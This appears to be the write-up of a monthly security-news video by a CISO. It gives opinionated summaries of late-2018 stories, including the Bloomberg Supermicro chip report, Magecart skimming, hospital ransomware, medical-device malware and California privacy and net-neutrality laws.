[VIDEO] NewsJacker October: Bloomberg's Supermicro story, Infected Medical Devices, & CA Privacy Law

 

In this month's NewsJacker episode, Mike covers the InfoSec news you need to know in 7+ minutes.

 

Security Events

  • The Super Micro event happened
  • BEC is way up
  • DDOS using MicroTik routers seen last week
  • CA passes its own Net Neutrality law, regulates security of IoT, including a ban on default passwords
  • Finally, some attention on the water sector

First, this Super Micro business. Bloomberg journalists, known for maintaining high standards, seem to have screwed the pooch on this one. They claim that the Chinese have penetrated the supply chain of Super Micro computers and added a chip that effectively gives them full access. There’s a lot to unpack there – it would have to be against specific targets to avoid detection, everyone denies this (including the intel community), so Bloomberg has some ‘splainin to do. This isn’t over, but the denials combined with a lack of evidence suggest this didn’t happen… which raises the more interesting question – how was Bloomberg led to believe this?
Source: Decoding the Chinese Super Micro super spy-chip super-scandal: What do we know and who is telling the truth?

 

Finance

Yikes! USSS warns that ATMs are being wiretapped, so that a skimmer isn’t necessary. Look for weird faceplates on ATMs that may conceal holes that have been drilled to insert surveillance gear.
Source: Secret Service Warns of Surge in ATM Wiretapping Attacks

Further, and impacting a lot of retail, is the ongoing Magecart attack campaign. This works by breaching websites and injecting a malicious script that loads on payment pages to collect the card details provided by users at checkout, and sending that info to a control server. Honestly, the real problem is application security and the failure to test applications against a reasonable standard like OWASP.
Source: Magecart Attacks Grow Rampant in September

 

Healthcare

Lutheran Hospital in Ft. Wayne, Indiana had to cancel elective surgeries and divert ambulances to other facilities because of a “cyberattack”. OK, first of all when you have a ransomware outbreak, it’s not an “attack”. Someone tripped over the background noise of the Internet – it’s not personal. Still, the fact that hospital operations were disrupted that badly speaks to the ease with which the commoditized attack tools can cause collateral damage that far exceeds the annoyance of having to consider paying a ransom.
Source: Cyberattack forces Indiana hospital to cancel elective surgeries, divert ambulances

More to the point on trends, some surveys conducted by HIMSS have some interesting results that I think we should really be addressing: 20% of hospital executives say that malware has hit medical devices. That’s pretty disturbing...
Source: 1 in 5 health IT execs say malware has hit devices

And worse, they claim that 30% of those devices can’t be patched. We’re not there yet, but the time may be upon us that a trip to the ER to be connected to a life-saving piece of technology may be a roll of the dice in itself.
Source: Provider executives say one-third of their medical devices are unpatchable

 

Government and Military

Wow. OK, as a country the US has a new cyber strategy that is far less defensive and far more offensive. Is this a good thing? For deterrence it may be – countries are less likely to pull the trigger if they know retaliation is our policy (and the US is seriously good at this). However, that depends on attribution – knowing with a high degree of certainty what country is behind an action. Attribution is a black art, and there will always be claims of false flag and denials. Because of that, this policy has all the potential to result in outcomes that are the exact opposite of those intended.

Interestingly, Britain has actually practiced shutting down Russian infrastructure, and more importantly, made it known publicly that they’ve practiced. That in itself is deterrence.
Source: Britain has reportedly practiced a cyberattack to send Moscow into total blackout

The DOD is finding that many of our high-tech weapons – including nuclear weapons and nuclear warning systems – are insecure, and thus the threat of accidental nuclear war, or the inability to react in time to a nuclear event are now fun new things we can lump into the “cyber is going to kill us all” conversation.
Source: New Report Finds Nuclear Weapons and Related Systems Increasingly Vulnerable to Cyberattack, Analyzes Scenarios, and Offers Recommendations to Prevent Catastrophe

Litigation issues – California passed their own net neutrality law, and Vermont followed. The president says that these laws cause irreparable harm to the United States (setting aside that NN was the norm for a long time, and somehow, we didn’t fall over). Interestingly, it’s not the federal government suing these states, it’s the entire telecom industry. So, what does that tell you?

Also, it’s now clear that 99% of the unique-source comments to the FCC regarding net neutrality were in favor of it, and that nearly all of the comments urging repeal were from stolen usernames. 
Source:  Trump admin claims Calif. net neutrality law causes irreparable harm to US

 

Privacy and Surveillance

From the “you’re the product” department, almost every major free VPN service is tracking you, and selling your data. Yup, that privacy tool is doing exactly the opposite of the expectation created by using it. I honestly think that we could all get much better at reading terms of use before clicking that accept button.
Source:  Almost Every Major Free VPN Service is a Glorified Data Farm

Amazon has patented technology for Alexa to diagnose you based on your tone of voice, coughing, sounding depressed, etc. to recommend meds for you to buy. On the face of it, this is a seriously bad idea and I don’t know how this made it through the Amazon PR-FAQ process. Clearly, there are no privacy implications of letting its voice assistant analyze the emotional and physical states of Amazon customers. None at all. My prediction is that this one doesn’t make it to market.
Source:  Amazon patents Alexa tech to tell if you’re sick, depressed and sell you meds

California privacy act of 2018 will be enacted 1/1/20 unless lawsuits hold it up. This is all about giving consumers control over how their information will be used – including a requirement to allow consumers to opt-out of data being sold. Somewhat similar to GDPR, this trend is not going away. We’re all sick of being mined for data on our habits in order to sell us something, manipulate our opinions, or steal from us (basically the 3 things the Internet is good at).

Finally, a number of articles on how spending on security is not moving the needle. Using examples like Facebook’s troubles, despite significant allocation of resources, and some general consensus that continuing to spend on technology to solve security problems is not worth the money, let me just say I agree. 
Source:  Exclusive: Tighter cyber security deemed not value for money
Source:  Cyber-Attack automation gives hackers unprecedented advantage

 

In Conclusion

Spending on new tech that promises to solve your problems is not as effective as rolling up your sleeves, having appropriate preventive controls in place, and accepting that they will fail and being able to fall back on detection and response. How you limit the impact of what is now a foreseeable event – it’s going to happen. You’re secure until your ticket is punched, so you’d better be watching that network.

I'm Mike Hamilton, and this is NewsJacker.

Michael K Hamilton

Michael K Hamilton CISSP

The CISO